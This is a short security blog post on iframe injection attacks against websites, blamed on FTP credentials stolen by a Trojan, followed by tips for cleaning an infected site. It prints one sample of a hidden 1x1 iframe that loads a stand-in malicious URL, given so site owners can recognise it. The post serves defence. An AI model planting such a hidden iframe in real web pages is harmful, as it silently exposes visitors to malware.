Iframe injection website attack and tips to clean the infection
Recently thousands of legitimate websites are being hacked with the “Iframe code injection” attack resulting in Cross Site Scripting (XSS) for unsuspicious users who get infected with a malware virus when they visit that legitimate websites. What happens is that an “Iframe html code” is injected at the end (usually) of “index.php” or “index.html” files of the legitimate websites. This “iframe” code embeds into the legitimate site a malicious code which installs a virus to the visitor’s PC or tries to steal sensitive information. The <iframe> html tag is used to embed content from other website into the current page. Usually an injected iframe code looks like the following:
<iframe src=”http://some-malicious-web-url” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
The problem usually is not because of vulnerability on the website itself but rather is usually caused by a malware Trojan which infects the website owner’s PC. The Trojan (maybe Mpack script released by Russians and sold for $1000) steals the FTP password of the website owner and connects to the website as ftp user, thus being able to upload and modify files on the website. After the website gets infected, Google usually reports the site as “This Site May Harm Your Computer”, thus harming the reputation of the website.
Some tips to clean the infection of your site:
- First of all scan and clean your own computer which you use to connect to your site. The Trojan might be undetectable by some antivirus, so you better format the windows and install a fresh copy.
- Change ALL your passwords and most importantly the FTP passwords and the website control panel passwords.
- Download all files from your website and store them in a safe place on your PC to further analyze the infection.
- If you have a recent clean backup of your website, upload the backup files and replace all current files.
- If you don’t have a backup (shame on you!!) then edit all source code (html or PHP files) and search for <iframe> html commands inside the code. Delete the suspicious <iframe> and re-upload all html, php files to your website.
- Download an antivirus tool which scans the website for <iframe> content. If you use WordPress there is an antivirus plugin for that which you can download directly from WordPress HERE.
Related posts:
- How to Clean up your Computer Monitor-Tips and Methods
- Scan Suspicious Files with multiple antivirus engines
- Cisco ASA ftp inspection purpose
- Fix Microsoft Windows after virus infection
- Information Security Cyber Threats for 2010
Tagged with: antivirus for wordpress • iframe in index.php • iframe injection • iframe injection in wordpress
Filed under: General Security
Like this post? Subscribe to my RSS feed and get loads more!
First Step : change FTP password
Step 2 : Download all files and clean
Step3 : upload Files
Remeber Do not save FTP password in your FTP client
If you suspects that your system is infected, Format and install OS, then install a good antivirus + firewall. I suggest Avast free edition and Comodo Firewall.
We have received many inquiries and we cleaned those infected sites. If your site is infected Please contact us
Best Regards,
Team HelloSystemadmin.com